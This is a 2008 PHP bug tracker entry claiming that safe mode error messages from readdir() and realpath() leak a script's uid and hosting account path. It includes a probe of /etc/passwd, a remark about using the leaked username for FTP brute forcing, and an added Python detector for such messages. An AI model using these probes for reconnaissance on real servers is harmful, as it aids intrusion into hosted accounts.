Bug #46831 safe mode bypass in readdir(), realpath()
Submitted: 2008-12-11 04:36 UTC
Modified: 2008-12-24 01:00 UTC
Votes: 3
Avg. Score: 2.3 ± 0.9
Reproduced: 0 of 1 (0.0%)
From: cmos_clr at hotmail dot com
Assigned:
Status: No Feedback
Package: Safe Mode/open_basedir
PHP Version: 5.2CVS-2008-12-11 (snap)
OS: linux
Private report: No
CVE-ID: None

 [2008-12-11 04:36 UTC] cmos_clr at hotmail dot com
Description:
------------
::_::_::_::_::_::_::_::_::_::_::::_::_::_::_::_::_::_::_::_::_::::_::_::_::_::_::_::_::_::_::_::_:: 
::
::Found by  :  CmOs_CLR & hard_hakerz
::
::MAILS     :  CmOs_CLR@hotmail.com & hard_hakerz@hotmail.com
::
::SITE      :  wwW.SEC4EVER.coM
::
::-----------ABOUT Software:---------------- 
::
::VERSION   : PHP 5.2.6
::
::Vendor    : http://www.php.net
::
::------------------------------------------
::
::
::Responsible Functions : readdir() , realpath()
::
::WHERE IS THE PROBLEM ?
::
::IN SERVERS WITH SAFE MODE ON AND * getmyuid() * DISABLED WE CAN BYPASS THIS.
::
::FIRST THIS ERROR WILL RESULT : getmyuid() has been disabled for security reasons.
::
::FOR readdir() :
::
::  
::  <?php
::  if ($handle = opendir('.')) {
::      while (false !== ($file = readdir($handle))) {
::          if ($file != "." && $file != "..") {
::              echo "$file\n";
::          }
::      }
::      closedir($handle);
::  }
::  ?>
::
::for realpath() :
::
::
::  <?php
::  echo realpath('/etc/passwd');
::  ?>
::
::THE RESULT IS :
:: The script whose *uid is 100* is not allowed to access /etc/passwd owned by uid 0 in
:: /home/*user*/domains/site.com/public_html/function.php on line xx
::
::NOTE : a lot of other functions can result in this error ("getmyuid() bypass"). An attacker can take a lot of information from this
::error, like: is safe mode activated from http.conf or php.ini? Who is the user of a site? (= the FTP user; this can simplify FTP brute forcing to only the password, because the user is known) ......etc
::This error is a getmyuid() bypass in a disabled function.
::
::
::thanks+good luck
::
::
::
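
Added example (not part of the original report and not PHP project code): a Python check a site operator can run over response bodies from their own pages to detect the safe mode message quoted above and list the fields it exposes. The function name, the sample bodies and the /home/<account>/ layout are assumptions made for illustration.

```python
import re

# Pattern built from the message quoted in the report:
# "The script whose uid is 100 is not allowed to access /etc/passwd
#  owned by uid 0 in /home/.../function.php on line xx"
LEAK_RE = re.compile(
    r"The script whose uid is (?P<script_uid>\d+) is not allowed to access "
    r"(?P<target>\S+) owned by uid (?P<owner_uid>\d+)"
    r"(?: in (?P<script_path>\S+) on line (?P<line>\d+))?"
)
# Assumption: shared-hosting layout /home/<account>/..., as in the report.
HOME_RE = re.compile(r"^/home/([^/]+)/")
TAG_RE = re.compile(r"<[^>]+>")

# Constructed sample bodies (not captured from a real server).
SAMPLE_HTML = (
    "<html><body><br />\n<b>Warning</b>: realpath(): The script whose uid is 100 "
    "is not allowed to access /etc/passwd owned by uid 0 in "
    "<b>/home/exampleuser/domains/example.test/public_html/function.php</b> "
    "on line <b>2</b><br />\n</body></html>"
)
SAMPLE_CLEAN = "<html><body>An internal error occurred.</body></html>"


def find_uid_leaks(body):
    """Return one dict per safe mode uid message found in a response body."""
    # Drop HTML markup and join wrapped lines so the message is contiguous.
    text = re.sub(r"\s+", " ", TAG_RE.sub("", body))
    findings = []
    for match in LEAK_RE.finditer(text):
        leak = match.groupdict()
        # The script path usually embeds the hosting account name.
        home = HOME_RE.match(leak["script_path"] or "")
        leak["account"] = home.group(1) if home else None
        findings.append(leak)
    return findings


if __name__ == "__main__":
    for name, body in (("error page", SAMPLE_HTML), ("clean page", SAMPLE_CLEAN)):
        leaks = find_uid_leaks(body)
        print(name, "->", leaks if leaks else "no uid message exposed")
```
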


 [2008-12-16 18:58 UTC] iliaa@php.net
Where is the security issue, you get an appropriate error about access 
denied it would seem, no?
 [2008-12-24 01:00 UTC] php-bugs at lists dot php dot net
No feedback was provided for this bug for over a week, so it is
being suspended automatically. If you are able to provide the
information that was originally requested, please do so and change
the status of the bug back to "Open".
 
Last updated: Thu Dec 13 19:01:27 2018 UTC